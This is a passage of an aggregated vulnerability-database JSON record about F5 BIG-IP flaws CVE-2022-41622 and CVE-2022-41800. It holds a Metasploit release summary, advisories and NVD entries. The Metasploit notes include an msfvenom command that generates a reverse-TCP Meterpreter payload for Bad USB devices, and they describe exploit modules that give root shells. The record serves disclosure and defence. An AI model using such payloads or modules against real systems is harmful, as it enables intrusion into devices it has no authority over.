"published": "2023-02-01T15:57:57", "type": "rapid7blog", "title": "CVE-2023-22374: F5 BIG-IP Format String Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800", "CVE-2023-22374"], "modified": "2023-02-01T15:57:57", "id": "RAPID7BLOG:88C0DAFA91CD3F8C9F21B748E969AA2A", "href": "https://blog.rapid7.com/2023/02/01/cve-2023-22374-f5-big-ip-format-string-vulnerability/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-30T18:33:40", "description": "## F5 Big-IP\n\n\n\nThis week\u2019s Metasploit release contains 2 new modules released as part of the [Rapid7 F5 BIG-IP and iControl REST Vulnerabilities research article](<https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/>).\n\nThese discoveries were made by our very own [Ron Bowes](<https://github.com/rbowes-r7>), who developed an [exploit module](<https://github.com/rapid7/metasploit-framework/pull/17273>) for authenticated RCE against F5 devices running in appliance mode to achieve a Meterpreter session as the root user.\n\n[Ron Bowes](<https://github.com/rbowes-r7>) has also developed an F5 [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/17271>) exploiting [CVE-2022-41622](<https://attackerkb.com/topics/i21EbdNxks/cve-2022-41622?referrer=blog>), a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below - which leads to an arbitrary file overwrite as root. 
With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the root user.\n\nFor more information, see [Rapid7\u2019s blog post](<https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/>) which detail the vulnerabilities.\n\n## DuckyScript support\n\nCommunity contributor [h00die](<https://github.com/h00die>) contributed an [enhancement](<https://github.com/rapid7/metasploit-framework/pull/17279>) to `msfvenom`. This adds the `ducky-script-psh` format to `msfvenom`:\n \n \n msfvenom -p windows/meterpreter/reverse_tcp -f ducky-script-psh lhost=127.0.0.1 lport=444\n \n\nThis allows users to create payloads that are compatible with Bad USB devices such as the Flipper Zero.\n\n## New module content (3)\n\n * [F5 BIG-IP iControl Authenticated RCE via RPM Creator](<https://github.com/rapid7/metasploit-framework/pull/17273>) by [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-41800](<https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800?referrer=blog>) \\- This adds an authenticated RCE for F5 devices that leverages the command injection flaw identified in [CVE-2022-41800](<https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800?referrer=blog>).\n * [F5 BIG-IP iControl CSRF File Write SOAP API](<https://github.com/rapid7/metasploit-framework/pull/17271>) by [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-41622](<https://attackerkb.com/topics/i21EbdNxks/cve-2022-41622?referrer=blog>) \\- This module exploits a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below which leads to an arbitrary file overwrite as root. 
With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the `root` user.\n * [ChurchInfo 1.2.13-1.3.0 Authenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/17257>) by m4lwhere, which exploits [CVE-2021-43258](<https://attackerkb.com/topics/ASbWdFdI4Q/cve-2021-43258?referrer=blog>) \\- A new module has been added for [CVE-2021-43258](<https://attackerkb.com/topics/ASbWdFdI4Q/cve-2021-43258?referrer=blog>) which exploits a flaw whereby, when emailing users in the ChurchInfo database with attachments, the uploaded file is hosted in a web accessible location under the ChurchInfo web root before the email is sent. An authenticated attacker can abuse this to gain RCE as the `www-user` user.\n\n## Enhancements and features (6)\n\n * [#17145](<https://github.com/rapid7/metasploit-framework/pull/17145>) from [k0pak4](<https://github.com/k0pak4>) \\- This PR adds the ability to authenticate via hash and improves the error reporting when authentication fails.\n * [#17279](<https://github.com/rapid7/metasploit-framework/pull/17279>) from [h00die](<https://github.com/h00die>) \\- This adds the `ducky-script-psh` format to msfvenom so it can create payloads that are compatible with Bad USB devices such as the Flipper Zero.\n * [#17283](<https://github.com/rapid7/metasploit-framework/pull/17283>) from [bcoles](<https://github.com/bcoles>) \\- Improves the `linux/gather/enum_psk` module, and adds documentation\n * [#17284](<https://github.com/rapid7/metasploit-framework/pull/17284>) from [bcoles](<https://github.com/bcoles>) \\- Updates `modules/post/linux/gather/enum_network` and `modules/post/linux/gather/tor_hiddenservices` to extract hostname details in a similar fashion to other modules\n * [#17285](<https://github.com/rapid7/metasploit-framework/pull/17285>) from [bcoles](<https://github.com/bcoles>) \\- Improves validation in `linux/gather/tor_hiddenservices` to ensure that the `locate` command is present 
before running the module\n * [#17296](<https://github.com/rapid7/metasploit-framework/pull/17296>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Adds clarification to the module documentation that links to external resources are not controlled by project maintainers. These external resources may no longer exist and are subject to malicious takeover in the future. These links should be reviewed accordingly.\n\n## Bugs fixed (1)\n\n * [#17277](<https://github.com/rapid7/metasploit-framework/pull/17277>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash within the python reverse http stager.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.27...6.2.28](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-11-17T05%3A52%3A06-06%3A00..2022-11-24T10%3A30%3A44%2B00%3A00%22>)\n * [Full diff 6.2.27...6.2.28](<https://github.com/rapid7/metasploit-framework/compare/6.2.27...6.2.28>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-25T17:14:15", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-43258", "CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-25T17:14:15", "id": "RAPID7BLOG:B4E26DF19E173872B288BDE35B3248A5", "href": "https://blog.rapid7.com/2022/11/25/metasploit-weekly-wrap-up-185/", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-01-20T20:06:52", "description": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at November 16, 2022 10:34pm UTC reported:\n\nThis permits a user who already has an administrator account to create a shell on the target device. 
There are other (authorized) ways to do this, so this vulnerability is pretty minor, IMO, although if it IS exploited it grants access to a network load balancer which is kind of a big deal.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-20T00:00:00", "type": "attackerkb", "title": "CVE-2022-41800", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-41622", "CVE-2022-41800"], "modified": "2023-01-20T00:00:00", "id": "AKB:EB86163A-D6FE-4561-8D2C-40CE96FB9F2F", "href": "https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-11-18T10:14:29", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Two security flaws in F5 BIG-IP and BIG-IQ can be exploited to enable remote code execution. 
An adversary could get persistent root access to the device's management interface by successfully exploiting the vulnerability (CVE-2022-41622), however this requires the attacker to know the address for a certain BIG-IP instance. Although the proof of concept is available, such an exploit requires an administrator with an active session visiting a rogue website.", "cvss3": {}, "published": "2022-11-18T08:42:14", "type": "hivepro", "title": "RCE flaw in F5 BIG-IP and BIG-IQ", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41622"], "modified": "2022-11-18T08:42:14", "id": "HIVEPRO:97778E9F6B00532FECC982DB2002C416", "href": "https://www.hivepro.com/rce-flaw-in-f5-big-ip-and-big-iq/", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2022-11-23T14:53:21", "description": "A cross-site request forgery vulnerability exists in F5 Big-IP. Successful exploitation of this vulnerability could result in code execution on the affected system.", "cvss3": {}, "published": "2022-11-23T00:00:00", "type": "checkpoint_advisories", "title": "F5 Big-IP Cross-Site Request Forgery (CVE-2022-41622)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41622"], "modified": "2022-11-23T00:00:00", "id": "CPAI-2022-0927", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-23T14:53:15", "description": "A command injection vulnerability exists in F5 Big-IP. 
Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {}, "published": "2022-11-23T00:00:00", "type": "checkpoint_advisories", "title": "F5 Big-IP Command Injection (CVE-2022-41800)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41800"], "modified": "2022-11-23T00:00:00", "id": "CPAI-2022-0928", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-02-09T14:44:24", "description": "In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-07T04:15:00", "type": "cve", "title": "CVE-2022-41622", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41622"], "modified": "2022-12-08T20:14:00", "cpe": ["cpe:/a:f5:big-ip_link_controller:16.1.3", "cpe:/a:f5:big-ip_fraud_protection_service:16.1.3", "cpe:/a:f5:big-ip_application_security_manager:14.1.5", "cpe:/a:f5:big-ip_access_policy_manager:16.1.3", "cpe:/a:f5:big-ip_advanced_firewall_manager:16.1.3", "cpe:/a:f5:big-ip_domain_name_system:15.1.8", "cpe:/a:f5:big-ip_global_traffic_manager:15.1.8", "cpe:/a:f5:big-ip_analytics:15.1.8", "cpe:/a:f5:big-ip_application_security_manager:16.1.3", "cpe:/a:f5:big-ip_application_acceleration_manager:15.1.8", "cpe:/a:f5:big-ip_local_traffic_manager:15.1.8", "cpe:/a:f5:big-ip_analytics:14.1.5", "cpe:/a:f5:big-ip_analytics:16.1.3", 
"cpe:/a:f5:big-ip_access_policy_manager:14.1.5", "cpe:/a:f5:big-ip_fraud_protection_service:15.1.8", "cpe:/a:f5:big-ip_policy_enforcement_manager:16.1.3", "cpe:/a:f5:big-iq_centralized_management:8.2.0", "cpe:/a:f5:big-ip_local_traffic_manager:14.1.5", "cpe:/a:f5:big-ip_analytics:13.1.5", "cpe:/a:f5:big-ip_application_acceleration_manager:14.1.5", "cpe:/a:f5:big-iq_centralized_management:7.1.0", "cpe:/a:f5:big-ip_domain_name_system:16.1.3", "cpe:/a:f5:big-ip_local_traffic_manager:13.1.5", "cpe:/a:f5:big-ip_fraud_protection_service:17.0.0", "cpe:/a:f5:big-ip_global_traffic_manager:16.1.3", "cpe:/a:f5:big-ip_policy_enforcement_manager:13.1.5", "cpe:/a:f5:big-ip_application_security_manager:13.1.5", "cpe:/a:f5:big-ip_link_controller:14.1.5", "cpe:/a:f5:big-ip_global_traffic_manager:13.1.5", "cpe:/a:f5:big-ip_advanced_firewall_manager:13.1.5", "cpe:/a:f5:big-ip_application_acceleration_manager:13.1.5", "cpe:/a:f5:big-ip_domain_name_system:13.1.5", "cpe:/a:f5:big-ip_access_policy_manager:13.1.5", "cpe:/a:f5:big-ip_link_controller:17.0.0", "cpe:/a:f5:big-ip_link_controller:13.1.5", "cpe:/a:f5:big-ip_global_traffic_manager:17.0.0", "cpe:/a:f5:big-ip_domain_name_system:14.1.5", "cpe:/a:f5:big-ip_advanced_firewall_manager:15.1.8", "cpe:/a:f5:big-ip_application_acceleration_manager:17.0.0", "cpe:/a:f5:big-ip_local_traffic_manager:16.1.3", "cpe:/a:f5:big-ip_global_traffic_manager:14.1.5", "cpe:/a:f5:big-ip_local_traffic_manager:17.0.0", "cpe:/a:f5:big-ip_application_security_manager:15.1.8", "cpe:/a:f5:big-ip_domain_name_system:17.0.0", "cpe:/a:f5:big-ip_advanced_firewall_manager:17.0.0", "cpe:/a:f5:big-ip_fraud_protection_service:14.1.5", "cpe:/a:f5:big-ip_fraud_protection_service:13.1.5", "cpe:/a:f5:big-ip_analytics:17.0.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:14.1.5", "cpe:/a:f5:big-ip_advanced_firewall_manager:14.1.5", "cpe:/a:f5:big-ip_policy_enforcement_manager:15.1.8", "cpe:/a:f5:big-ip_link_controller:15.1.8", 
"cpe:/a:f5:big-ip_application_acceleration_manager:16.1.3", "cpe:/a:f5:big-ip_access_policy_manager:17.0.0", "cpe:/a:f5:big-ip_access_policy_manager:15.1.8", "cpe:/a:f5:big-ip_policy_enforcement_manager:17.0.0", "cpe:/a:f5:big-ip_application_security_manager:17.0.0"], "id": "CVE-2022-41622", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41622", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:f5:big-ip_fraud_protection_service:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:17.0.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:f5:big-ip_policy_enforcement_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-iq_centralized_management:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:13.1.5:*:*:*:*:*:*:*", 
"cpe:2.3:a:f5:big-ip_application_security_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-iq_centralized_management:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:15.1.8:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:44:39", "description": "In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.7, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.8}, "published": "2022-12-07T04:15:00", "type": "cve", "title": "CVE-2022-41800", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41800"], "modified": "2022-12-12T15:25:00", "cpe": ["cpe:/a:f5:big-ip_link_controller:16.1.3", "cpe:/a:f5:big-ip_fraud_protection_service:16.1.3", "cpe:/a:f5:big-ip_application_security_manager:14.1.5", "cpe:/a:f5:big-ip_access_policy_manager:16.1.3", "cpe:/a:f5:big-ip_global_traffic_manager:15.1.8", "cpe:/a:f5:big-ip_domain_name_system:15.1.8", "cpe:/a:f5:big-ip_analytics:15.1.8", "cpe:/a:f5:big-ip_application_security_manager:16.1.3", "cpe:/a:f5:big-ip_application_acceleration_manager:15.1.8", "cpe:/a:f5:big-ip_local_traffic_manager:15.1.8", "cpe:/a:f5:big-ip_analytics:14.1.5", "cpe:/a:f5:big-ip_analytics:16.1.3", "cpe:/a:f5:big-ip_access_policy_manager:14.1.5", 
"cpe:/a:f5:big-ip_fraud_protection_service:15.1.8", "cpe:/a:f5:big-ip_policy_enforcement_manager:16.1.3", "cpe:/a:f5:big-ip_local_traffic_manager:14.1.5", "cpe:/a:f5:big-ip_analytics:13.1.5", "cpe:/a:f5:big-ip_application_acceleration_manager:14.1.5", "cpe:/a:f5:big-ip_policy_enforcement_manager:13.1.5", "cpe:/a:f5:big-ip_local_traffic_manager:13.1.5", "cpe:/a:f5:big-ip_fraud_protection_service:17.0.0", "cpe:/a:f5:big-ip_domain_name_system:16.1.3", "cpe:/a:f5:big-ip_global_traffic_manager:16.1.3", "cpe:/a:f5:big-ip_application_security_manager:13.1.5", "cpe:/a:f5:big-ip_link_controller:14.1.5", "cpe:/a:f5:big-ip_global_traffic_manager:13.1.5", "cpe:/a:f5:big-ip_application_acceleration_manager:13.1.5", "cpe:/a:f5:big-ip_domain_name_system:13.1.5", "cpe:/a:f5:big-ip_access_policy_manager:13.1.5", "cpe:/a:f5:big-ip_link_controller:17.0.0", "cpe:/a:f5:big-ip_link_controller:13.1.5", "cpe:/a:f5:big-ip_global_traffic_manager:17.0.0", "cpe:/a:f5:big-ip_domain_name_system:14.1.5", "cpe:/a:f5:big-ip_application_acceleration_manager:17.0.0", "cpe:/a:f5:big-ip_local_traffic_manager:16.1.3", "cpe:/a:f5:big-ip_global_traffic_manager:14.1.5", "cpe:/a:f5:big-ip_local_traffic_manager:17.0.0", "cpe:/a:f5:big-ip_application_security_manager:15.1.8", "cpe:/a:f5:big-ip_domain_name_system:17.0.0", "cpe:/a:f5:big-ip_advanced_firewall_manager:17.0.0", "cpe:/a:f5:big-ip_fraud_protection_service:14.1.5", "cpe:/a:f5:big-ip_fraud_protection_service:13.1.5", "cpe:/a:f5:big-ip_analytics:17.0.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:14.1.5", "cpe:/a:f5:big-ip_policy_enforcement_manager:15.1.8", "cpe:/a:f5:big-ip_link_controller:15.1.8", "cpe:/a:f5:big-ip_application_acceleration_manager:16.1.3", "cpe:/a:f5:big-ip_access_policy_manager:17.0.0", "cpe:/a:f5:big-ip_access_policy_manager:15.1.8", "cpe:/a:f5:big-ip_policy_enforcement_manager:17.0.0", "cpe:/a:f5:big-ip_application_security_manager:17.0.0"], "id": "CVE-2022-41800", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41800", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:f5:big-ip_fraud_protection_service:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:13.1.5:*:*:*:*:*:*:*", 
"cpe:2.3:a:f5:big-ip_access_policy_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:15.1.8:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2023-03-25T10:52:25", 